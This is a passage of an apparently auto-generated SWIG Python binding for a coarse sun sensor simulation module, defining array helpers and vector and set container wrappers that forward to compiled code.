self.__class__.__name__, strthis,)\n\ntry:\n _object = object\n _newclass = 1\nexcept __builtin__.Exception:\n class _object:\n pass\n _newclass = 0\n\nclass SwigPyIterator(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)\n\n def __init__(self, *args, **kwargs):\n raise AttributeError(\"No constructor defined - class is abstract\")\n __repr__ = _swig_repr\n __swig_destroy__ = _coarse_sun_sensor.delete_SwigPyIterator\n __del__ = lambda self: None\n\n def value(self):\n return _coarse_sun_sensor.SwigPyIterator_value(self)\n\n def incr(self, n=1):\n return _coarse_sun_sensor.SwigPyIterator_incr(self, n)\n\n def decr(self, n=1):\n return _coarse_sun_sensor.SwigPyIterator_decr(self, n)\n\n def distance(self, x):\n return _coarse_sun_sensor.SwigPyIterator_distance(self, x)\n\n def equal(self, x):\n return _coarse_sun_sensor.SwigPyIterator_equal(self, x)\n\n def copy(self):\n return _coarse_sun_sensor.SwigPyIterator_copy(self)\n\n def next(self):\n return _coarse_sun_sensor.SwigPyIterator_next(self)\n\n def __next__(self):\n return _coarse_sun_sensor.SwigPyIterator___next__(self)\n\n def previous(self):\n return _coarse_sun_sensor.SwigPyIterator_previous(self)\n\n def advance(self, n):\n return _coarse_sun_sensor.SwigPyIterator_advance(self, n)\n\n def __eq__(self, x):\n return _coarse_sun_sensor.SwigPyIterator___eq__(self, x)\n\n def __ne__(self, x):\n return _coarse_sun_sensor.SwigPyIterator___ne__(self, x)\n\n def __iadd__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___iadd__(self, n)\n\n def __isub__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___isub__(self, n)\n\n def __add__(self, n):\n return _coarse_sun_sensor.SwigPyIterator___add__(self, n)\n\n def __sub__(self, *args):\n return _coarse_sun_sensor.SwigPyIterator___sub__(self, *args)\n def __iter__(self):\n return self\nSwigPyIterator_swigregister = _coarse_sun_sensor.SwigPyIterator_swigregister\nSwigPyIterator_swigregister(SwigPyIterator)\n\n\ndef new_doubleArray(nelements):\n return _coarse_sun_sensor.new_doubleArray(nelements)\nnew_doubleArray = _coarse_sun_sensor.new_doubleArray\n\ndef delete_doubleArray(ary):\n return _coarse_sun_sensor.delete_doubleArray(ary)\ndelete_doubleArray = _coarse_sun_sensor.delete_doubleArray\n\ndef doubleArray_getitem(ary, index):\n return _coarse_sun_sensor.doubleArray_getitem(ary, index)\ndoubleArray_getitem = _coarse_sun_sensor.doubleArray_getitem\n\ndef doubleArray_setitem(ary, index, value):\n return _coarse_sun_sensor.doubleArray_setitem(ary, index, value)\ndoubleArray_setitem = _coarse_sun_sensor.doubleArray_setitem\n\ndef new_longArray(nelements):\n return _coarse_sun_sensor.new_longArray(nelements)\nnew_longArray = _coarse_sun_sensor.new_longArray\n\ndef delete_longArray(ary):\n return _coarse_sun_sensor.delete_longArray(ary)\ndelete_longArray = _coarse_sun_sensor.delete_longArray\n\ndef longArray_getitem(ary, index):\n return _coarse_sun_sensor.longArray_getitem(ary, index)\nlongArray_getitem = _coarse_sun_sensor.longArray_getitem\n\ndef longArray_setitem(ary, index, value):\n return _coarse_sun_sensor.longArray_setitem(ary, index, value)\nlongArray_setitem = _coarse_sun_sensor.longArray_setitem\n\ndef new_intArray(nelements):\n return _coarse_sun_sensor.new_intArray(nelements)\nnew_intArray = _coarse_sun_sensor.new_intArray\n\ndef delete_intArray(ary):\n return _coarse_sun_sensor.delete_intArray(ary)\ndelete_intArray = _coarse_sun_sensor.delete_intArray\n\ndef intArray_getitem(ary, index):\n return _coarse_sun_sensor.intArray_getitem(ary, index)\nintArray_getitem = _coarse_sun_sensor.intArray_getitem\n\ndef intArray_setitem(ary, index, value):\n return _coarse_sun_sensor.intArray_setitem(ary, index, value)\nintArray_setitem = _coarse_sun_sensor.intArray_setitem\n\ndef new_shortArray(nelements):\n return _coarse_sun_sensor.new_shortArray(nelements)\nnew_shortArray = _coarse_sun_sensor.new_shortArray\n\ndef delete_shortArray(ary):\n return _coarse_sun_sensor.delete_shortArray(ary)\ndelete_shortArray = _coarse_sun_sensor.delete_shortArray\n\ndef shortArray_getitem(ary, index):\n return _coarse_sun_sensor.shortArray_getitem(ary, index)\nshortArray_getitem = _coarse_sun_sensor.shortArray_getitem\n\ndef shortArray_setitem(ary, index, value):\n return _coarse_sun_sensor.shortArray_setitem(ary, index, value)\nshortArray_setitem = _coarse_sun_sensor.shortArray_setitem\n\n\ndef getStructSize(self):\n try:\n return eval('sizeof_' + repr(self).split(';')[0].split('.')[-1])\n except (NameError) as e:\n typeString = 'sizeof_' + repr(self).split(';')[0].split('.')[-1]\n raise NameError(e.message + '\\nYou tried to get this size macro: ' + typeString + \n '\\n It appears to be undefined. \\nYou need to run the SWIG GEN_SIZEOF' + \n ' SWIG macro against the class/struct in your SWIG file if you want to ' + \n ' make this call.\\n')\n\n\ndef protectSetAttr(self, name, value):\n if(hasattr(self, name) or name == 'this'):\n object.__setattr__(self, name, value)\n else:\n raise ValueError('You tried to add this variable: ' + name + '\\n' + \n 'To this class: ' + str(self))\n\ndef protectAllClasses(moduleType):\n import inspect\n clsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n for member in clsmembers:\n try:\n exec(str(member[0]) + '.__setattr__ = protectSetAttr')\n exec(str(member[0]) + '.getStructSize = getStructSize') \n except (AttributeError, TypeError) as e:\n pass\n\n\n\ndef new_boolArray(nelements):\n return _coarse_sun_sensor.new_boolArray(nelements)\nnew_boolArray = _coarse_sun_sensor.new_boolArray\n\ndef delete_boolArray(ary):\n return _coarse_sun_sensor.delete_boolArray(ary)\ndelete_boolArray = _coarse_sun_sensor.delete_boolArray\n\ndef boolArray_getitem(ary, index):\n return _coarse_sun_sensor.boolArray_getitem(ary, index)\nboolArray_getitem = _coarse_sun_sensor.boolArray_getitem\n\ndef boolArray_setitem(ary, index, value):\n return _coarse_sun_sensor.boolArray_setitem(ary, index, value)\nboolArray_setitem = _coarse_sun_sensor.boolArray_setitem\nclass IntVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, IntVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, IntVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.IntVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.IntVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.IntVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.IntVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.IntVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.IntVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.IntVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.IntVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.IntVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.IntVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.IntVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.IntVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.IntVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.IntVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.IntVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.IntVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.IntVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.IntVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.IntVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.IntVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.IntVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.IntVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.IntVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_IntVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.IntVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.IntVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.IntVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.IntVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.IntVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.IntVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.IntVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.IntVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_IntVector\n __del__ = lambda self: None\nIntVector_swigregister = _coarse_sun_sensor.IntVector_swigregister\nIntVector_swigregister(IntVector)\n\nclass DoubleVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, DoubleVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, DoubleVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.DoubleVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.DoubleVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.DoubleVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.DoubleVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.DoubleVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.DoubleVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.DoubleVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.DoubleVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.DoubleVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.DoubleVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.DoubleVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.DoubleVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.DoubleVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.DoubleVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.DoubleVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.DoubleVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.DoubleVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.DoubleVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.DoubleVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.DoubleVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.DoubleVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_DoubleVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.DoubleVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.DoubleVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.DoubleVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.DoubleVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.DoubleVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.DoubleVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.DoubleVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.DoubleVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_DoubleVector\n __del__ = lambda self: None\nDoubleVector_swigregister = _coarse_sun_sensor.DoubleVector_swigregister\nDoubleVector_swigregister(DoubleVector)\n\nclass StringVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, StringVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, StringVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.StringVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.StringVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.StringVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.StringVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.StringVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.StringVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.StringVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.StringVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.StringVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.StringVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.StringVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.StringVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.StringVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.StringVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.StringVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.StringVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.StringVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.StringVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.StringVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.StringVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.StringVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.StringVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.StringVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_StringVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.StringVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.StringVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.StringVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.StringVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.StringVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.StringVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.StringVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.StringVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_StringVector\n __del__ = lambda self: None\nStringVector_swigregister = _coarse_sun_sensor.StringVector_swigregister\nStringVector_swigregister(StringVector)\n\nclass StringSet(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, StringSet, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, StringSet, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.StringSet_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.StringSet___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.StringSet___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.StringSet___len__(self)\n\n def append(self, x):\n return _coarse_sun_sensor.StringSet_append(self, x)\n\n def __contains__(self, x):\n return _coarse_sun_sensor.StringSet___contains__(self, x)\n\n def __getitem__(self, i):\n return _coarse_sun_sensor.StringSet___getitem__(self, i)\n\n def add(self, x):\n return _coarse_sun_sensor.StringSet_add(self, x)\n\n def discard(self, x):\n return _coarse_sun_sensor.StringSet_discard(self, x)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_StringSet(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def empty(self):\n return _coarse_sun_sensor.StringSet_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.StringSet_size(self)\n\n def clear(self):\n return _coarse_sun_sensor.StringSet_clear(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.StringSet_swap(self, v)\n\n def count(self, x):\n return _coarse_sun_sensor.StringSet_count(self, x)\n\n def begin(self):\n return _coarse_sun_sensor.StringSet_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.StringSet_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.StringSet_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.StringSet_rend(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.StringSet_erase(self, *args)\n\n def find(self, x):\n return _coarse_sun_sensor.StringSet_find(self, x)\n\n def lower_bound(self, x):\n return _coarse_sun_sensor.StringSet_lower_bound(self, x)\n\n def upper_bound(self, x):\n return _coarse_sun_sensor.StringSet_upper_bound(self, x)\n\n def equal_range(self, x):\n return _coarse_sun_sensor.StringSet_equal_range(self, x)\n\n def insert(self, __x):\n return _coarse_sun_sensor.StringSet_insert(self, __x)\n __swig_destroy__ = _coarse_sun_sensor.delete_StringSet\n __del__ = lambda self: None\nStringSet_swigregister = _coarse_sun_sensor.StringSet_swigregister\nStringSet_swigregister(StringSet)\n\nclass intSet(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, intSet, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, intSet, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.intSet_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.intSet___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.intSet___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.intSet___len__(self)\n\n def append(self, x):\n return _coarse_sun_sensor.intSet_append(self, x)\n\n def __contains__(self, x):\n return _coarse_sun_sensor.intSet___contains__(self, x)\n\n def __getitem__(self, i):\n return _coarse_sun_sensor.intSet___getitem__(self, i)\n\n def add(self, x):\n return _coarse_sun_sensor.intSet_add(self, x)\n\n def discard(self, x):\n return _coarse_sun_sensor.intSet_discard(self, x)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_intSet(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def empty(self):\n return _coarse_sun_sensor.intSet_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.intSet_size(self)\n\n def clear(self):\n return _coarse_sun_sensor.intSet_clear(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.intSet_swap(self, v)\n\n def count(self, x):\n return _coarse_sun_sensor.intSet_count(self, x)\n\n def begin(self):\n return _coarse_sun_sensor.intSet_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.intSet_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.intSet_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.intSet_rend(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.intSet_erase(self, *args)\n\n def find(self, x):\n return _coarse_sun_sensor.intSet_find(self, x)\n\n def lower_bound(self, x):\n return _coarse_sun_sensor.intSet_lower_bound(self, x)\n\n def upper_bound(self, x):\n return _coarse_sun_sensor.intSet_upper_bound(self, x)\n\n def equal_range(self, x):\n return _coarse_sun_sensor.intSet_equal_range(self, x)\n\n def insert(self, __x):\n return _coarse_sun_sensor.intSet_insert(self, __x)\n __swig_destroy__ = _coarse_sun_sensor.delete_intSet\n __del__ = lambda self: None\nintSet_swigregister = _coarse_sun_sensor.intSet_swigregister\nintSet_swigregister(intSet)\n\nclass ConstCharVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, ConstCharVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, ConstCharVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.ConstCharVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.ConstCharVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.ConstCharVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.ConstCharVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.ConstCharVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.ConstCharVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.ConstCharVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.ConstCharVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.ConstCharVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.ConstCharVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.ConstCharVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.ConstCharVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.ConstCharVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.ConstCharVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.ConstCharVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.ConstCharVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.ConstCharVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.ConstCharVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.ConstCharVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.ConstCharVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_ConstCharVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.ConstCharVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.ConstCharVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.ConstCharVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.ConstCharVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.ConstCharVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.ConstCharVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.ConstCharVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.ConstCharVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_ConstCharVector\n __del__ = lambda self: None\nConstCharVector_swigregister = _coarse_sun_sensor.ConstCharVector_swigregister\nConstCharVector_swigregister(ConstCharVector)\n\nclass MultiArray(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, MultiArray, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, MultiArray, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.MultiArray_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.MultiArray___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.MultiArray___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.MultiArray___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.MultiArray___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.MultiArray___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.MultiArray___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.MultiArray___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.MultiArray_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.MultiArray_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.MultiArray_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.MultiArray_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.MultiArray_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.MultiArray_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.MultiArray_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.MultiArray_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.MultiArray_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.MultiArray_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.MultiArray_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.MultiArray_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.MultiArray_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_MultiArray(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.MultiArray_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.MultiArray_front(self)\n\n def back(self):\n return _coarse_sun_sensor.MultiArray_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.MultiArray_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.MultiArray_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.MultiArray_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.MultiArray_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.MultiArray_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_MultiArray\n __del__ = lambda self: None\nMultiArray_swigregister = _coarse_sun_sensor.MultiArray_swigregister\nMultiArray_swigregister(MultiArray)\n\nclass CSSVector(_object):\n __swig_setmethods__ = {}\n __setattr__ = lambda self, name, value: _swig_setattr(self, CSSVector, name, value)\n __swig_getmethods__ = {}\n __getattr__ = lambda self, name: _swig_getattr(self, CSSVector, name)\n __repr__ = _swig_repr\n\n def iterator(self):\n return _coarse_sun_sensor.CSSVector_iterator(self)\n def __iter__(self):\n return self.iterator()\n\n def __nonzero__(self):\n return _coarse_sun_sensor.CSSVector___nonzero__(self)\n\n def __bool__(self):\n return _coarse_sun_sensor.CSSVector___bool__(self)\n\n def __len__(self):\n return _coarse_sun_sensor.CSSVector___len__(self)\n\n def __getslice__(self, i, j):\n return _coarse_sun_sensor.CSSVector___getslice__(self, i, j)\n\n def __setslice__(self, *args):\n return _coarse_sun_sensor.CSSVector___setslice__(self, *args)\n\n def __delslice__(self, i, j):\n return _coarse_sun_sensor.CSSVector___delslice__(self, i, j)\n\n def __delitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___delitem__(self, *args)\n\n def __getitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___getitem__(self, *args)\n\n def __setitem__(self, *args):\n return _coarse_sun_sensor.CSSVector___setitem__(self, *args)\n\n def pop(self):\n return _coarse_sun_sensor.CSSVector_pop(self)\n\n def append(self, x):\n return _coarse_sun_sensor.CSSVector_append(self, x)\n\n def empty(self):\n return _coarse_sun_sensor.CSSVector_empty(self)\n\n def size(self):\n return _coarse_sun_sensor.CSSVector_size(self)\n\n def swap(self, v):\n return _coarse_sun_sensor.CSSVector_swap(self, v)\n\n def begin(self):\n return _coarse_sun_sensor.CSSVector_begin(self)\n\n def end(self):\n return _coarse_sun_sensor.CSSVector_end(self)\n\n def rbegin(self):\n return _coarse_sun_sensor.CSSVector_rbegin(self)\n\n def rend(self):\n return _coarse_sun_sensor.CSSVector_rend(self)\n\n def clear(self):\n return _coarse_sun_sensor.CSSVector_clear(self)\n\n def get_allocator(self):\n return _coarse_sun_sensor.CSSVector_get_allocator(self)\n\n def pop_back(self):\n return _coarse_sun_sensor.CSSVector_pop_back(self)\n\n def erase(self, *args):\n return _coarse_sun_sensor.CSSVector_erase(self, *args)\n\n def __init__(self, *args):\n this = _coarse_sun_sensor.new_CSSVector(*args)\n try:\n self.this.append(this)\n except __builtin__.Exception:\n self.this = this\n\n def push_back(self, x):\n return _coarse_sun_sensor.CSSVector_push_back(self, x)\n\n def front(self):\n return _coarse_sun_sensor.CSSVector_front(self)\n\n def back(self):\n return _coarse_sun_sensor.CSSVector_back(self)\n\n def assign(self, n, x):\n return _coarse_sun_sensor.CSSVector_assign(self, n, x)\n\n def resize(self, *args):\n return _coarse_sun_sensor.CSSVector_resize(self, *args)\n\n def insert(self, *args):\n return _coarse_sun_sensor.CSSVector_insert(self, *args)\n\n def reserve(self, n):\n return _coarse_sun_sensor.CSSVector_reserve(self, n)\n\n def capacity(self):\n return _coarse_sun_sensor.CSSVector_capacity(self)\n __swig_destroy__ = _coarse_sun_sensor.delete_CSSVector\n __del__ = lambda self: None\nCSSVector_swigregister = 